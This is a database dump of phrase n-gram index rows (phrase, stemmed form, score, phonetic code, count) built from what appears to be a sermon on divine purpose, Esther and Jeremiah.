(304391, 'of being a', 'of being a', 0, 1, 1.3333, 'O152', 1, '*'),
(304392, 'of heaven are', 'of heaven are', 0, 1, 1.4333, 'O156', 1, '*'),
(304393, 'of heaven he', 'of heaven he', 0, 1, 1.4, 'O150', 1, '*'),
(304394, 'of her people', 'of her people', 0, 1, 1.4333, 'O1614', 1, '*'),
(304395, 'of obedience because', 'of obedience because', 0, 1, 1.6667, 'O135212', 1, '*'),
(304396, 'of people face', 'of people face', 0, 1, 1.4667, 'O1412', 1, '*'),
(304397, 'of power', 'of power', 0, 1, 1.2667, 'O160', 1, '*'),
(304398, 'of power are', 'of power are', 0, 1, 1.4, 'O160', 1, '*'),
(304399, 'of that are', 'of that are', 0, 1, 1.3667, 'O136', 1, '*'),
(304400, 'of the father', 'of the father', 0, 1, 1.4333, 'O13136', 1, '*'),
(304401, 'of the womb', 'of the womb', 0, 1, 1.3667, 'O1351', 1, '*'),
(304402, 'of where', 'of where', 0, 1, 1.2667, 'O160', 1, '*'),
(304403, 'of where you', 'of where you', 0, 1, 1.4, 'O160', 1, '*'),
(304404, 'oflsrael', 'oflsrael', 0, 0, 0.5333, 'O14264', 1, '*'),
(304405, 'oflsrael and', 'oflsrael and', 0, 1, 1.4, 'O1426453', 1, '*'),
(304406, 'oflsrael and he', 'oflsrael and he', 0, 1, 1.5, 'O1426453', 1, '*'),
(304407, 'on fulfilling', 'on fulfilling', 0, 1, 1.4333, 'O5141452', 1, '*'),
(304408, 'on fulfilling the', 'on fulfilling the', 0, 1, 1.5667, 'O51414523', 1, '*'),
(304409, 'on his way', 'on his way', 0, 1, 1.3333, 'O520', 1, '*'),
(304410, 'once the', 'onc the', 0, 1, 1.2667, 'O523', 2, '*'),
(304411, 'once the influence', 'onc the influence', 0, 1, 1.6, 'O52351452', 1, '*'),
(304412, 'or city', 'or city', 0, 1, 1.2333, 'O623', 1, '*'),
(304413, 'or city that', 'or city that', 0, 1, 1.4, 'O623', 1, '*'),
(304414, 'or giving', 'or giving', 0, 1, 1.3, 'O62152', 1, '*'),
(304415, 'or giving less', 'or giving less', 0, 1, 1.4667, 'O6215242', 1, '*'),
(304416, 'ordained thee', 'ordain thee', 0, 1, 1.4333, 'O6353', 1, '*'),
(304417, 'ordained thee a', 'ordain thee a', 0, 1, 1.5, 'O6353', 1, '*'),
(304418, 'ordained you a', 'ordain you a', 0, 1, 1.4667, 'O6353', 1, '*'),
(304419, 'other things on', 'other things on', 0, 1, 1.5, 'O363525', 1, '*'),
(304420, 'other things outside', 'other things outside', 0, 1, 1.6667, 'O36352323', 1, '*'),
(304421, 'outside of', 'outsid of', 0, 1, 1.3333, 'O3231', 1, '*'),
(304422, 'outside of being', 'outsid of being', 0, 1, 1.5333, 'O323152', 1, '*'),
(304423, 'outside of that', 'outsid of that', 0, 1, 1.5, 'O32313', 1, '*'),
(304424, 'ow', 'ow', 0, 0, 0.1333, 'O000', 1, '*'),
(304425, 'ow saviour', 'ow saviour', 0, 1, 1.3333, 'O216', 1, '*'),
(304426, 'ow saviour knewwhat', 'ow saviour knewwhat', 0, 1, 1.6333, 'O216253', 1, '*'),
(304427, 'people face', 'peopl face', 0, 1, 1.3667, 'P412', 1, '*'),
(304428, 'people face difficulties', 'peopl face difficulties', 0, 1, 1.8, 'P412312432', 1, '*'),
(304429, 'people while', 'peopl while', 0, 1, 1.4, 'P400', 1, '*'),
(304430, 'people while enjoying', 'peopl while enjoying', 0, 1, 1.7, 'P45252', 1, '*'),
(304431, 'place of authority', 'place of authority', 0, 1, 1.6, 'P421363', 1, '*'),
(304432, 'platform god', 'platform god', 0, 1, 1.4, 'P4316523', 1, '*'),
(304433, 'platform god gives', 'platform god gives', 0, 1, 1.6, 'P4316523212', 1, '*'),
(304434, 'position and platform', 'posit and platform', 0, 1, 1.7, 'P2353143165', 1, '*'),
(304435, 'position of', 'posit of', 0, 1, 1.3667, 'P2351', 1, '*'),
(304436, 'position of power', 'posit of power', 0, 1, 1.5667, 'P23516', 1, '*'),
(304437, 'power are', 'power are', 0, 1, 1.3, 'P600', 1, '*'),
(304438, 'power are you', 'power are you', 0, 1, 1.4333, 'P600', 1, '*'),
(304439, 'preserver', 'preserv', 0, 0, 0.6, 'P62616', 1, '*'),
(304440, 'preserver oflsrael', 'preserv oflsrael', 0, 1, 1.6, 'P6261614264', 1, '*'),
(304441, 'preserver oflsrael and', 'preserv oflsrael and', 0, 1, 1.7333, 'P626161426453', 1, '*'),
(304442, 'primary purpose', 'primari purpose', 0, 1, 1.5, 'P6561612', 1, '*'),
(304443, 'primary purpose and', 'primari purpose and', 0, 1, 1.6333, 'P656161253', 1, '*'),
(304444, 'primary purpose drove', 'primari purpose drove', 0, 1, 1.7, 'P6561612361', 1, '*'),
(304445, 'primary purpose from', 'primari purpose from', 0, 1, 1.6667, 'P6561612165', 1, '*'),
(304446, 'primary purpose in', 'primari purpose in', 0, 1, 1.6, 'P65616125', 1, '*'),
(304447, 'primary purpose jeremiah', 'primari purpose jeremiah', 0, 1, 1.8, 'P656161265', 1, '*'),
(304448, 'primary purpose like', 'primari purpose like', 0, 1, 1.6667, 'P656161242', 1, '*'),
(304449, 'primary purpose of', 'primari purpose of', 0, 1, 1.6, 'P65616121', 1, '*'),
(304450, 'primary purpose the', 'primari purpose the', 0, 1, 1.6333, 'P65616123', 1, '*'),
(304451, 'primary purpose was', 'primari purpose was', 0, 1, 1.6333, 'P6561612', 1, '*'),
(304452, 'primary purpose while', 'primari purpose while', 0, 1, 1.7, 'P65616124', 1, '*'),
(304453, 'primary purposes', 'primari purposes', 0, 1, 1.5333, 'P6561612', 1, '*'),
(304454, 'primary purposes as', 'primari purposes as', 0, 1, 1.6333, 'P6561612', 1, '*'),
(304455, 'primary purposes of', 'primari purposes of', 0, 1, 1.6333, 'P65616121', 1, '*'),
(304456, 'prime', 'prime', 0, 0, 0.3333, 'P650', 2, '*'),
(304457, 'prime minister', 'prime minister', 0, 1, 1.4667, 'P65236', 2, '*'),
(304458, 'prime minister in', 'prime minister in', 0, 1, 1.5667, 'P652365', 1, '*'),
(304459, 'program of', 'program of', 0, 1, 1.3333, 'P62651', 1, '*'),
(304460, 'program of god', 'program of god', 0, 1, 1.4667, 'P6265123', 1, '*'),
(304461, 'prophet of', 'prophet of', 0, 1, 1.3333, 'P6131', 1, '*'),
(304462, 'prophet of god', 'prophet of god', 0, 1, 1.4667, 'P613123', 1, '*'),
(304463, 'prophet unto', 'prophet unto', 0, 1, 1.4, 'P61353', 1, '*'),
(304464, 'prophet unto the', 'prophet unto the', 0, 1, 1.5333, 'P61353', 1, '*'),
(304465, 'purpose and divine', 'purpos and divine', 0, 1, 1.6, 'P6125315', 1, '*'),
(304466, 'purpose and god', 'purpos and god', 0, 1, 1.5, 'P6125323', 1, '*'),
(304467, 'purpose and make', 'purpos and make', 0, 1, 1.5333, 'P6125352', 1, '*'),
(304468, 'purpose drove', 'purpos drove', 0, 1, 1.4333, 'P612361', 1, '*'),
(304469, 'purpose drove him', 'purpos drove him', 0, 1, 1.5667, 'P6123615', 1, '*'),
(304470, 'purpose from', 'purpos from', 0, 1, 1.4, 'P612165', 1, '*'),
(304471, 'purpose from our', 'purpos from our', 0, 1, 1.5333, 'P6121656', 1, '*'),
(304472, 'purpose god will', 'purpos god will', 0, 1, 1.5333, 'P61234', 1, '*'),
(304473, 'purpose i', 'purpos i', 0, 1, 1.3, 'P612', 1, '*'),
(304474, 'purpose i told', 'purpos i told', 0, 1, 1.4667, 'P612343', 1, '*'),
(304475, 'purpose in your', 'purpos in your', 0, 1, 1.5, 'P61256', 1, '*'),
(304476, 'purpose jeremiah', 'purpos jeremiah', 0, 1, 1.5333, 'P61265', 1, '*'),
(304477, 'purpose jeremiah l', 'purpos jeremiah l', 0, 1, 1.6, 'P612654', 1, '*'),
(304478, 'purpose like', 'purpos like', 0, 1, 1.4, 'P61242', 1, '*'),
(304479, 'purpose like healing', 'purpos like healing', 0, 1, 1.6667, 'P61242452', 1, '*'),
(304480, 'purpose of being', 'purpos of being', 0, 1, 1.5333, 'P612152', 1, '*'),
(304481, 'purpose of where', 'purpos of where', 0, 1, 1.5333, 'P61216', 1, '*'),
(304482, 'purpose the', 'purpos the', 0, 1, 1.3667, 'P6123', 1, '*'),
(304483, 'purpose the primary', 'purpos the primary', 0, 1, 1.6333, 'P61231656', 1, '*'),
(304484, 'purpose the resources', 'purpos the resources', 0, 1, 1.7, 'P61236262', 1, '*'),
(304485, 'purpose to', 'purpos to', 0, 1, 1.3333, 'P6123', 1, '*'),
(304486, 'purpose to cancel', 'purpos to cancel', 0, 1, 1.5667, 'P61232524', 1, '*'),
(304487, 'purpose was', 'purpos was', 0, 1, 1.3667, 'P612', 1, '*'),
(304488, 'purpose was that', 'purpos was that', 0, 1, 1.5333, 'P6123', 1, '*'),
(304489, 'purpose was to', 'purpos was to', 0, 1, 1.4667, 'P6123', 1, '*'),
(304490, 'purpose while', 'purpos while', 0, 1, 1.4333, 'P6124', 1, '*'),
(304491, 'purpose while the', 'purpos while the', 0, 1, 1.5667, 'P61243', 1, '*'),
(304492, 'purposes', 'purpos', 0, 0, 0.5333, 'P612', 2, '*'),
(304493, 'purposes as', 'purpos as', 0, 1, 1.3667, 'P612', 1, '*'),
(304494, 'purposes as well', 'purpos as well', 0, 1, 1.5333, 'P6124', 1, '*'),
(304495, 'purposes he', 'purpos he', 0, 1, 1.3667, 'P612', 1, '*'),
(304496, 'purposes he told', 'purpos he told', 0, 1, 1.5333, 'P612343', 1, '*'),
(304497, 'purposes of', 'purpos of', 0, 1, 1.3667, 'P6121', 1, '*'),
(304498, 'purposes of god', 'purpos of god', 0, 1, 1.5, 'P612123', 1, '*'),
(304499, 'purposes the', 'purpos the', 0, 1, 1.4, 'P6123', 1, '*'),
(304500, 'purposes the commitment', 'purpos the commitment', 0, 1, 1.7667, 'P612325353', 1, '*'),
(304501, 'queen', 'queen', 0, 0, 0.3333, 'Q500', 2, '*'),
(304502, 'queen in', 'queen in', 0, 1, 1.2667, 'Q500', 1, '*'),
(304503, 'queen in the', 'queen in the', 0, 1, 1.4, 'Q530', 1, '*'),
(304504, 'question today', 'question today', 0, 1, 1.4667, 'Q353', 1, '*'),
(304505, 'question today before', 'question today before', 0, 1, 1.7, 'Q35316', 1, '*'),
(304506, 'raising', 'rais', 0, 0, 0.4667, 'R252', 1, '*'),
(304507, 'raising the', 'rais the', 0, 1, 1.3667, 'R2523', 1, '*'),
(304508, 'raising the dead', 'rais the dead', 0, 1, 1.5333, 'R2523', 1, '*'),
(304509, 'resources and', 'resourc and', 0, 1, 1.4333, 'R26253', 1, '*'),
(304510, 'resources and allocations', 'resourc and allocations', 0, 1, 1.8333, 'R2625342352', 1, '*'),
(304511, 'right now in', 'right now in', 0, 1, 1.4, 'R235', 1, '*'),
(304512, 'right she', 'right she', 0, 1, 1.3, 'R232', 1, '*'),
(304513, 'right she fulfilled', 'right she fulfilled', 0, 1, 1.6333, 'R23214143', 1, '*'),
(304514, 's before', 's before', 0, 1, 1.2667, 'S160', 1, '*'),
(304515, 's before i', 's before i', 0, 1, 1.3333, 'S160', 1, '*'),
(304516, 's heart 11', 's heart 11', 0, 1, 1.3333, 'S630', 1, '*'),
(304517, 'sanctified', 'sanctifi', 0, 0, 0.6667, 'S52313', 1, '*'),
(304518, 'sanctified thee', 'sanctifi thee', 0, 1, 1.5, 'S52313', 1, '*'),
(304519, 'sanctified thee and', 'sanctifi thee and', 0, 1, 1.6333, 'S5231353', 1, '*'),
(304520, 'saviour and', 'saviour and', 0, 1, 1.3667, 'S1653', 1, '*'),
(304521, 'saviour and preserver', 'saviour and preserver', 0, 1, 1.7, 'S1653162616', 1, '*'),
(304522, 'saviour knewwhat', 'saviour knewwhat', 0, 1, 1.5333, 'S16253', 1, '*'),
(304523, 'saviour knewwhat his', 'saviour knewwhat his', 0, 1, 1.6667, 'S162532', 1, '*'),
(304524, 'saviour of her', 'saviour of her', 0, 1, 1.4667, 'S1616', 1, '*'),
(304525, 'secondary purpose', 'secondari purpose', 0, 1, 1.5667, 'S5361612', 1, '*'),
(304526, 'secondary purpose god', 'secondari purpose god', 0, 1, 1.7, 'S53616123', 1, '*'),
(304527, 'secondary purpose i', 'secondari purpose i', 0, 1, 1.6333, 'S5361612', 1, '*'),
(304528, 'secondary purpose of', 'secondari purpose of', 0, 1, 1.6667, 'S53616121', 1, '*'),
(304529, 'secondary purpose the', 'secondari purpose the', 0, 1, 1.7, 'S53616123', 1, '*'),
(304530, 'secondary purpose to', 'secondari purpose to', 0, 1, 1.6667, 'S53616123', 1, '*'),
(304531, 'secondary purposes', 'secondari purposes', 0, 1, 1.6, 'S5361612', 1, '*'),
(304532, 'secondary purposes he', 'secondari purposes he', 0, 1, 1.7, 'S5361612', 1, '*'),
(304533, 'secondary purposes the', 'secondari purposes the', 0, 1, 1.7333, 'S53616123', 1, '*'),
(304534, 'see where', 'see where', 0, 1, 1.3, 'S600', 1, '*'),
(304535, 'see where exactly', 'see where exactly', 0, 1, 1.5667, 'S6234', 1, '*'),
(304536, 'she fulfilled', 'she fulfilled', 0, 1, 1.4333, 'S14143', 1, '*'),
(304537, 'she fulfilled the', 'she fulfilled the', 0, 1, 1.5667, 'S14143', 1, '*'),
(304538, 'she got', 'she got', 0, 1, 1.2333, 'S300', 1, '*'),
(304539, 'she got it', 'she got it', 0, 1, 1.3333, 'S300', 1, '*'),
(304540, 'shifted', 'shift', 0, 0, 0.4667, 'S130', 1, '*'),
(304541, 'shifted their', 'shift their', 0, 1, 1.4333, 'S136', 1, '*'),
(304542, 'shifted their attention', 'shift their attention', 0, 1, 1.7667, 'S1363535', 1, '*'),
(304543, 'sick raising', 'sick raising', 0, 1, 1.4, 'S6252', 1, '*'),
(304544, 'sick raising the', 'sick raising the', 0, 1, 1.5333, 'S62523', 1, '*'),
(304545, 'so many other', 'so many other', 0, 1, 1.4333, 'S536', 1, '*'),
(304546, 'state or', 'state or', 0, 1, 1.2667, 'S360', 1, '*'),
(304547, 'state or city', 'state or city', 0, 1, 1.4333, 'S3623', 1, '*'),
(304548, 'struggle on', 'struggl on', 0, 1, 1.3667, 'S36245', 1, '*'),
(304549, 'struggle on the', 'struggl on the', 0, 1, 1.5, 'S362453', 1, '*'),
(304550, 'such a time', 'such a time', 0, 1, 1.3667, 'S350', 2, '*'),
(304551, 'that 1', 'that 1', 0, 1, 1.2, 'T000', 1, '*'),
(304552, 'that 1 want', 'that 1 want', 0, 1, 1.3667, 'T530', 1, '*'),
(304553, 'that are secondary', 'that are secondary', 0, 1, 1.6, 'T62536', 1, '*'),
(304554, 'that country', 'that country', 0, 1, 1.4, 'T2536', 1, '*'),
(304555, 'that country state', 'that country state', 0, 1, 1.6, 'T253623', 1, '*'),
(304556, 'that direction', 'that direction', 0, 1, 1.4667, 'T6235', 1, '*'),
(304557, 'that direction a', 'that direction a', 0, 1, 1.5333, 'T6235', 1, '*'),
(304558, 'that is to', 'that is to', 0, 1, 1.3333, 'T230', 1, '*'),
(304559, 'that place', 'that place', 0, 1, 1.3333, 'T142', 3, '*'),
(304560, 'that place of', 'that place of', 0, 1, 1.4333, 'T1421', 1, '*'),
(304561, 'that position', 'that position', 0, 1, 1.4333, 'T1235', 1, '*'),
(304562, 'that position of', 'that position of', 0, 1, 1.5333, 'T12351', 1, '*'),
(304563, 'that question', 'that question', 0, 1, 1.4333, 'T235', 1, '*'),
(304564, 'that question today', 'that question today', 0, 1, 1.6333, 'T2353', 1, '*'),
(304565, 'that was why', 'that was why', 0, 1, 1.4, 'T200', 1, '*'),
(304566, 'the affluence', 'the affluence', 0, 1, 1.4333, 'T1452', 1, '*'),
(304567, 'the affluence is', 'the affluence is', 0, 1, 1.5333, 'T1452', 1, '*'),
(304568, 'the affluence once', 'the affluence once', 0, 1, 1.6, 'T145252', 1, '*'),
(304569, 'the belly', 'the belly', 0, 1, 1.3, 'T140', 1, '*'),
(304570, 'the belly i', 'the belly i', 0, 1, 1.3667, 'T140', 1, '*'),
(304571, 'the commitment', 'the commitment', 0, 1, 1.4667, 'T25353', 1, '*'),
(304572, 'the commitment of', 'the commitment of', 0, 1, 1.5667, 'T253531', 1, '*'),
(304573, 'the cross although', 'the cross although', 0, 1, 1.6, 'T262432', 1, '*'),
(304574, 'the dead but', 'the dead but', 0, 1, 1.4, 'T130', 1, '*'),
(304575, 'the influence', 'the influence', 0, 1, 1.4333, 'T51452', 1, '*'),
(304576, 'the influence has', 'the influence has', 0, 1, 1.5667, 'T51452', 1, '*'),
(304577, 'the influence is', 'the influence is', 0, 1, 1.5333, 'T51452', 1, '*'),
(304578, 'the kingdom for', 'the kingdom for', 0, 1, 1.5, 'T2523516', 2, '*'),
(304579, 'the land jesus', 'the land jesus', 0, 1, 1.4667, 'T4532', 1, '*'),
(304580, 'the nations if', 'the nations if', 0, 1, 1.4667, 'T53521', 1, '*'),
(304581, 'the nations in', 'the nations in', 0, 1, 1.4667, 'T53525', 1, '*'),
(304582, 'the primary purpose', 'the primary purpose', 0, 1, 1.6333, 'T16561612', 1, '*'),
(304583, 'the primary purposes', 'the primary purposes', 0, 1, 1.6667, 'T16561612', 1, '*'),
(304584, 'the prime', 'the prime', 0, 1, 1.3, 'T165', 1, '*'),
(304585, 'the prime minister', 'the prime minister', 0, 1, 1.6, 'T165236', 1, '*'),
(304586, 'the program', 'the program', 0, 1, 1.3667, 'T16265', 1, '*'),
(304587, 'the program of', 'the program of', 0, 1, 1.4667, 'T162651', 1, '*'),
(304588, 'the resources', 'the resources', 0, 1, 1.4333, 'T6262', 2, '*'),
(304589, 'the resources and', 'the resources and', 0, 1, 1.5667, 'T626253', 1, '*'),
(304590, 'the secondary', 'the secondary', 0, 1, 1.4333, 'T2536', 1, '*'),
(304591, 'the secondary purpose', 'the secondary purpose', 0, 1, 1.7, 'T25361612', 1, '*'),
(304592, 'the sick raising', 'the sick raising', 0, 1, 1.5333, 'T26252', 1, '*'),
(304593, 'the womb i', 'the womb i', 0, 1, 1.3333, 'T510', 1, '*'),
(304594, 'thee a', 'thee a', 0, 1, 1.2, 'T000', 1, '*'),
(304595, 'thee a prophet', 'thee a prophet', 0, 1, 1.4667, 'T1613', 1, '*'),
(304596, 'thee and', 'thee and', 0, 1, 1.2667, 'T530', 1, '*'),
(304597, 'thee and before', 'thee and before', 0, 1, 1.5, 'T5316', 1, '*'),
(304598, 'thee and i', 'thee and i', 0, 1, 1.3333, 'T530', 1, '*'),
(304599, 'thee in', 'thee in', 0, 1, 1.2333, 'T500', 1, '*'),
(304600, 'thee in the', 'thee in the', 0, 1, 1.3667, 'T530', 1, '*'),
(304601, 'their attention', 'their attention', 0, 1, 1.5, 'T63535', 1, '*'),
(304602, 'their attention from', 'their attention from', 0, 1, 1.6667, 'T63535165', 1, '*'),
(304603, 'their lives joseph', 'their lives joseph', 0, 1, 1.6, 'T64121', 1, '*'),
(304604, 'there are primary', 'there are primary', 0, 1, 1.5667, 'T61656', 1, '*'),
(304605, 'there you need', 'there you need', 0, 1, 1.4667, 'T653', 1, '*'),
(304606, 'they have shifted', 'thei have shifted', 0, 1, 1.5667, 'T1213', 1, '*'),
(304607, 'things connected', 'thing connected', 0, 1, 1.5333, 'T52523', 1, '*'),
(304608, 'things connected to', 'thing connected to', 0, 1, 1.6333, 'T52523', 1, '*'),
(304609, 'things contributing', 'thing contributing', 0, 1, 1.6333, 'T525361352', 1, '*'),
(304610, 'things contributing to', 'thing contributing to', 0, 1, 1.7333, 'T5253613523', 1, '*'),
(304611, 'things influence', 'thing influence', 0, 1, 1.5333, 'T5251452', 1, '*'),
(304612, 'things influence and', 'thing influence and', 0, 1, 1.6667, 'T525145253', 1, '*'),
(304613, 'things on', 'thing on', 0, 1, 1.3, 'T525', 1, '*'),
(304614, 'things on his', 'thing on his', 0, 1, 1.4333, 'T5252', 1, '*'),
(304615, 'things outside', 'thing outside', 0, 1, 1.4667, 'T52323', 1, '*'),
(304616, 'things outside of', 'thing outside of', 0, 1, 1.5667, 'T523231', 1, '*'),
(304617, 'this esther', 'thi esther', 0, 1, 1.3667, 'T236', 1, '*'),
(304618, 'this esther almost', 'thi esther almost', 0, 1, 1.6, 'T2364523', 1, '*'),
(304619, 'this kingdom', 'thi kingdom', 0, 1, 1.4, 'T25235', 1, '*'),
(304620, 'this kingdom there', 'thi kingdom there', 0, 1, 1.6, 'T2523536', 1, '*'),
(304621, 'those things contributing', 'those things contributing', 0, 1, 1.8333, 'T23525361352', 1, '*'),
(304622, 'thou camest', 'thou camest', 0, 1, 1.3667, 'T2523', 1, '*'),
(304623, 'thou camest forth', 'thou camest forth', 0, 1, 1.5667, 'T2523163', 1, '*'),
(304624, 'time as', 'time as', 0, 1, 1.2333, 'T520', 2, '*'),
(304625, 'time as this', 'time as this', 0, 1, 1.4, 'T5232', 2, '*'),
(304626, 'to answer that', 'to answer that', 0, 1, 1.4667, 'T5263', 1, '*'),
(304627, 'to cancel', 'to cancel', 0, 1, 1.3, 'T2524', 1, '*'),
(304628, 'to cancel his', 'to cancel his', 0, 1, 1.4333, 'T25242', 1, '*'),
(304629, 'to check', 'to check', 0, 1, 1.2667, 'T200', 1, '*'),
(304630, 'to check your', 'to check your', 0, 1, 1.4333, 'T260', 1, '*'),
(304631, 'to die on', 'to die on', 0, 1, 1.3, 'T500', 1, '*'),
(304632, 'to financing', 'to financing', 0, 1, 1.4, 'T15252', 1, '*'),
(304633, 'to financing and', 'to financing and', 0, 1, 1.5333, 'T1525253', 1, '*'),
(304634, 'to the primary', 'to the primary', 0, 1, 1.4667, 'T1656', 1, '*'),
(304635, 'to the program', 'to the program', 0, 1, 1.4667, 'T16265', 1, '*'),
(304636, 'to what', 'to what', 0, 1, 1.2333, 'T000', 1, '*'),
(304637, 'to what god', 'to what god', 0, 1, 1.3667, 'T230', 1, '*'),
(304638, 'to your primary', 'to your primary', 0, 1, 1.5, 'T61656', 1, '*'),
(304639, 'today before', 'todai before', 0, 1, 1.4, 'T160', 1, '*'),
(304640, 'today before it', 'todai before it', 0, 1, 1.5, 'T163', 1, '*'),
(304641, 'told jeremiah', 'told jeremiah', 0, 1, 1.4333, 'T43265', 1, '*'),
(304642, 'told jeremiah i', 'told jeremiah i', 0, 1, 1.5, 'T43265', 1, '*'),
(304643, 'told you every', 'told you every', 0, 1, 1.4667, 'T4316', 1, '*'),
(304644, 'too late may', 'too late may', 0, 1, 1.4, 'T435', 1, '*'),
(304645, 'towards the', 'toward the', 0, 1, 1.3667, 'T6323', 1, '*'),
(304646, 'towards the primary', 'toward the primary', 0, 1, 1.6333, 'T63231656', 1, '*'),
(304647, 'two things influence', 'two things influence', 0, 1, 1.6667, 'T5251452', 1, '*'),
(304648, 'understood', 'understood', 0, 0, 0.6667, 'U53623', 2, '*'),
(304649, 'understood that', 'understood that', 0, 1, 1.5, 'U53623', 2, '*'),
(304650, 'understood that that', 'understood that that', 0, 1, 1.6667, 'U53623', 1, '*'),
(304651, 'until he', 'until he', 0, 1, 1.2667, 'U534', 1, '*'),
(304652, 'until he fulfilled', 'until he fulfilled', 0, 1, 1.6, 'U53414143', 1, '*'),
(304653, 'unto the nations', 'unto the nations', 0, 1, 1.5333, 'U535352', 1, '*'),
(304654, 'utilized', 'util', 0, 0, 0.5333, 'U3423', 1, '*'),
(304655, 'utilized beloved', 'util beloved', 0, 1, 1.5333, 'U34231413', 1, '*'),
(304656, 'utilized beloved what', 'util beloved what', 0, 1, 1.7, 'U34231413', 1, '*'),
(304657, 'was his primary', 'wa his primary', 0, 1, 1.5, 'W21656', 1, '*'),
(304658, 'was that', 'wa that', 0, 1, 1.2667, 'W230', 1, '*'),
(304659, 'was that is', 'wa that is', 0, 1, 1.3667, 'W232', 1, '*'),
(304660, 'was the secondary', 'wa the secondary', 0, 1, 1.5667, 'W232536', 1, '*'),
(304661, 'was to be', 'wa to be', 0, 1, 1.3, 'W231', 1, '*'),
(304662, 'was why', 'wa why', 0, 1, 1.2333, 'W200', 1, '*'),
(304663, 'was why he', 'wa why he', 0, 1, 1.3333, 'W200', 1, '*'),
(304664, 'way to the', 'wai to the', 0, 1, 1.3333, 'W300', 1, '*'),
(304665, 'well as', 'well as', 0, 1, 1.2333, 'W420', 1, '*'),
(304666, 'well as secondary', 'well as secondary', 0, 1, 1.5667, 'W42536', 1, '*'),
(304667, 'where exactly', 'where exactly', 0, 1, 1.4333, 'W6234', 1, '*'),
(304668, 'where exactly you', 'where exactly you', 0, 1, 1.5667, 'W6234', 1, '*'),
(304669, 'where you are', 'where you are', 0, 1, 1.4333, 'W600', 2, '*'),
(304670, 'while enjoying', 'while enjoying', 0, 1, 1.4667, 'W45252', 1, '*'),
(304671, 'while enjoying the', 'while enjoying the', 0, 1, 1.6, 'W452523', 1, '*'),
(304672, 'while the affluence', 'while the affluence', 0, 1, 1.6333, 'W431452', 1, '*'),
(304673, 'who god', 'who god', 0, 1, 1.2333, 'W230', 1, '*'),
(304674, 'who god has', 'who god has', 0, 1, 1.3667, 'W232', 1, '*'),
(304675, 'why he enjoyed', 'why he enjoyed', 0, 1, 1.4667, 'W523', 1, '*'),
(304676, 'will not fund', 'will not fund', 0, 1, 1.4333, 'W453153', 1, '*'),
(304677, 'will not mind', 'will not mind', 0, 1, 1.4333, 'W45353', 1, '*'),
(304678, 'with two', 'with two', 0, 1, 1.2667, 'W300', 1, '*'),
(304679, 'with two things', 'with two things', 0, 1, 1.5, 'W352', 1, '*'),
(304680, 'withdrawn from their', 'withdrawn from their', 0, 1, 1.6667, 'W36516536', 1, '*'),
(304681, 'womb i', 'womb i', 0, 1, 1.2, 'W510', 1, '*'),
(304682, 'womb i sanctified', 'womb i sanctified', 0, 1, 1.5667, 'W51252313', 1, '*'),
(304683, 'would have failed', 'would have failed', 0, 1, 1.5667, 'W43143', 1, '*'),
(304684, 'you a prophet', 'you a prophet', 0, 1, 1.4333, 'Y1613', 1, '*'),
(304685, 'you actually', 'you actually', 0, 1, 1.4, 'Y234', 1, '*'),
(304686, 'you actually fulfilling', 'you actually fulfilling', 0, 1, 1.7667, 'Y234141452', 1, '*'),
(304687, 'you are compromising', 'you are compromising', 0, 1, 1.6667, 'Y625165252', 1, '*'),
(304688, 'you are like', 'you are like', 0, 1, 1.4, 'Y642', 1, '*'),
(304689, 'you are right', 'you are right', 0, 1, 1.4333, 'Y623', 1, '*'),
(304690, 'you enjoying', 'you enjoying', 0, 1, 1.4, 'Y5252', 1, '*'),
(304691, 'you enjoying the', 'you enjoying the', 0, 1, 1.5333, 'Y52523', 1, '*'),
(304692, 'you every position', 'you every position', 0, 1, 1.6, 'Y161235', 1, '*'),
(304693, 'you to check', 'you to check', 0, 1, 1.4, 'Y320', 1, '*'),
(304694, 'your primary purpose', 'your primary purpose', 0, 1, 1.6667, 'Y616561612', 1, '*'),
(304998, '10 per', '10 per', 0, 1, 1.2, 'P600', 1, '*'),
(304999, '10 per week', '10 per week', 0, 1, 1.3667, 'P620', 1, '*'),
(305000, '18 06', '18 06', 0, 1, 1.1667, '', 1, '*'),
(305001, '18 06 2017', '18 06 2017', 0, 1, 1.3333, '', 1, '*'),
(305002, '52 if', '52 if', 0, 1, 1.1667, 'I100', 1, '*'),
(305003, '52 if you', '52 if you', 0, 1, 1.3, 'I100', 1, '*'),
(305004, 'a result', 'a result', 0, 1, 1.2667, 'A6243', 1, '*'),
(305005, 'a result of', 'a result of', 0, 1, 1.3667, 'A62431', 1, '*'),
(305006, 'all without', 'all without', 0, 1, 1.3667, 'A430', 1, '*'),
(305007, 'all without leaving', 'all without leaving', 0, 1, 1.6333, 'A434152', 1, '*'),
(305008, 'all witnesses', 'all witnesses', 0, 1, 1.4333, 'A4352', 1, '*'),
(305009, 'all witnesses to', 'all witnesses to', 0, 1, 1.5333, 'A43523', 1, '*'),
(305010, 'always commit', 'alwai commit', 0, 1, 1.4333, 'A4253', 1, '*'),
(305011, 'always commit yourself', 'alwai commit yourself', 0, 1, 1.7333, 'A42536241', 1, '*'),
(305012, 'always rewards', 'alwai rewards', 0, 1, 1.4667, 'A42632', 1, '*'),
(305013, 'always rewards obedience', 'alwai rewards obedience', 0, 1, 1.8, 'A426321352', 1, '*'),
(305014, 'always write', 'alwai write', 0, 1, 1.4, 'A4263', 1, '*'),
(305015, 'always write down', 'alwai write down', 0, 1, 1.5667, 'A42635', 1, '*'),
(305016, 'an instruction', 'an instruction', 0, 1, 1.4667, 'A5236235', 1, '*'),
(305017, 'an instruction from', 'an instruction from', 0, 1, 1.6333, 'A5236235165', 1, '*'),
(305018, 'and as we', 'and as we', 0, 1, 1.3, 'A532', 1, '*'),
(305019, 'and destiny are', 'and destiny are', 0, 1, 1.5, 'A532356', 1, '*'),
(305020, 'and eve to', 'and eve to', 0, 1, 1.3333, 'A5313', 1, '*'),
(305021, 'and eventual', 'and eventual', 0, 1, 1.4, 'A531534', 1, '*'),
(305022, 'and eventual disobedience', 'and eventual disobedience', 0, 1, 1.8333, 'A531534321352', 1, '*'),
(305023, 'and forgets', 'and forgets', 0, 1, 1.3667, 'A5316232', 1, '*'),
(305024, 'and forgets the', 'and forgets the', 0, 1, 1.5, 'A53162323', 1, '*'),
(305025, 'and go', 'and go', 0, 1, 1.2, 'A532', 1, '*'),
(305026, 'and go over', 'and go over', 0, 1, 1.3667, 'A53216', 1, '*'),
(305027, 'and his people', 'and his people', 0, 1, 1.4667, 'A53214', 1, '*'),
(305028, 'and his two', 'and his two', 0, 1, 1.3667, 'A5323', 1, '*'),
(305029, 'and in the', 'and in the', 0, 1, 1.3333, 'A5353', 2, '*'),
(305030, 'and not obeyed', 'and not obeyed', 0, 1, 1.4667, 'A535313', 1, '*'),
